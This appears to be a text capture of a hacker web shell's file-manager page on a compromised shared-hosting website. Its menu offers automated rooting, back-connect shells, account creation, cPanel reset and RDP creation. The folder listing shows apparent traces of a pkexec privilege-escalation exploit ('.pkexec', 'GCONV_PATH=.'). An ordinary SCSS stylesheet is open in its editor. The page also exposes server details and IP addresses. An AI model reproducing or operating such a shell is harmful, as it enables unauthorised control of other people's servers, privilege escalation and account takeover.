Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
swift-xpc.com /
assets /
scss /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
_about.scss
1.39
KB
-rw-r--r--
_blog_page.scss
33.44
KB
-rw-r--r--
_bradcam.scss
5.12
KB
-rw-r--r--
_categories.scss
2.8
KB
-rw-r--r--
_color.scss
1.32
KB
-rw-r--r--
_common.scss
15.62
KB
-rw-r--r--
_contact-form.scss
5.92
KB
-rw-r--r--
_contact.scss
2.82
KB
-rw-r--r--
_elements.scss
23.43
KB
-rw-r--r--
_extend.scss
2.49
KB
-rw-r--r--
_footer.scss
3.83
KB
-rw-r--r--
_h1-hero.scss
5.27
KB
-rw-r--r--
_headerMenu.scss
6.07
KB
-rw-r--r--
_mixins.scss
346
B
-rw-r--r--
_our-info.scss
753
B
-rw-r--r--
_overlay.scss
983
B
-rw-r--r--
_pagination.scss
1.24
KB
-rw-r--r--
_services.scss
560
B
-rw-r--r--
_services_section.scss
0
B
-rw-r--r--
_team.scss
2.38
KB
-rw-r--r--
_testimonial.scss
2.73
KB
-rw-r--r--
_variables.scss
2.61
KB
-rw-r--r--
style.scss
931
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _categories.scss
.categories-area { .single-cat{ border: 1px solid #e1ebf7; border-radius: 6px; padding: 85px 22px; @include transition(.4s); position: relative; z-index: 1; @media #{$xs}{ padding: 50px 22px; } &::before { position: absolute; content: ""; width: 100%; height: 0; background:#30b666; transition: .6s; bottom: 0; left: 0; z-index: -1; border-radius: 6px; } .cat-icon{ span{ color: $theme-color; font-size: 50px; margin-bottom: 30px; display: block; } } .cat-cap{ h5{ & > a{ font-size: 36px; font-weight: 700; margin-bottom: 21px; display: block; @include transition(.2s); font-family:$font_2; @media #{$sm}{ font-size: 26px; } @media #{$xs}{ font-size: 26px; } } } p{ margin-bottom: 36px; color: #57667e; font-size: 16px; @include transition(.2s); @media #{$sm}{ font-size: 15px; } } a{ color: #1c165c; font-size: 16px; font-weight: 600; @include transition(.2s); } } // Hover Effect In single &:hover{ border: 1px solid transparent; // background: #ff3d1c; &::before { height: 100%; } .cat-icon{ span{ color: #fff; } } .cat-cap{ h5{ color: #fff; } p{ color: #fff; } a{ color: #fff; } } } } } // ul li::before{ // content: ""; // position: absolute; // top: 0; // left: 0; // width: 100%; // height: 100%; // background: transparent; // border-radius: 50%; // transform: scale(1); // transition: .5s; // border: 2px dashed red; // box-sizing:border-box; // animation: animate 10s linear infinite; // } // @keyframes animate{ // 0%{ // transform: scale(0.92) rotate(0deg); // } // 100%{ // transform: scale(0.92) rotate(360deg); // } // }
Close